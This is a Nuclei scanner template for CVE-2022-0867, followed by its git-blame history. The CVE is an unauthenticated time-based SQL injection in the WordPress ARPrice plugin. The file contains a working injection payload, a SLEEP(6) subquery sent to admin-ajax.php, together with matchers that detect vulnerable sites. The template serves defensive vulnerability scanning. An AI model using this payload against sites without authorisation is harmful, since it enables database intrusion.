nuclei-templates/http/cves/2022/CVE-2022-0867.yaml

id: CVE-2022-0867

info:
  name: WordPress ARPrice <3.6.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: |
    Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch.
  reference:
    - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
    - https://wordpress.org/plugins/arprice-responsive-pricing-table/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0867
    cwe-id: CWE-89
    epss-score: 0.05163
    epss-percentile: 0.92079
    cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: reputeinfosystems
    product: pricing_table
    framework: wordpress
  tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
      - |
        GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code_1 == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_2, "ArpPriceTable")'
        condition: and

# digest: 4a0a00473045022100c82e4677222be8a2c0b2d43a08c64b142c98b098aa9b41e3aa6607780a5e8a2602202aeab0a95c1f24a573015587ad9413c8bc0e7fe214b5132f535f3df2b6bee4f3:922c64590222798bb761d5b6d8e72950
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`id: CVE-2022-0867`

			`info:`
Dashboard Content Enhancements (#6308) Dashboard Content Enhancements 2022-12-09 21:40:18 +00:00			`name: WordPress ARPrice <3.6.1 - SQL Injection`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`author: theamanrawat`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#6308) Dashboard Content Enhancements 2022-12-09 21:40:18 +00:00			`WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch.`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494`
			`- https://wordpress.org/plugins/arprice-responsive-pricing-table/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0867`
			`classification:`
Auto Generated CVE annotations [Wed Nov 9 21:55:05 UTC 2022] :robot: 2022-11-09 21:55:05 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`cve-id: CVE-2022-0867`
Auto Generated CVE annotations [Wed Nov 9 21:55:05 UTC 2022] :robot: 2022-11-09 21:55:05 +00:00			`cwe-id: CWE-89`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.05163`
TemplateMan Update [Wed Oct 25 17:36:18 UTC 2023] :robot: 2023-10-25 17:36:19 +00:00			`epss-percentile: 0.92079`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:reputeinfosystems:pricing_table::::::wordpress::*`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: reputeinfosystems`
			`product: pricing_table`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
Auto Generated CVE annotations [Wed Nov 9 21:55:05 UTC 2022] :robot: 2022-11-09 21:55:05 +00:00			`tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`- raw:`
			`- \|`
Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`@timeout: 10s`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)`
			`- \|`
			`GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`- 'duration_1>=6'`
			`- 'status_code_1 == 200'`
			`- 'contains(content_type_1, "text/html")'`
			`- 'contains(body_2, "ArpPriceTable")'`
			`condition: and`
TemplateMan Update [Thu Oct 26 12:01:42 UTC 2023] :robot: 2023-10-26 12:01:43 +00:00
			`# digest: 4a0a00473045022100c82e4677222be8a2c0b2d43a08c64b142c98b098aa9b41e3aa6607780a5e8a2602202aeab0a95c1f24a573015587ad9413c8bc0e7fe214b5132f535f3df2b6bee4f3:922c64590222798bb761d5b6d8e72950`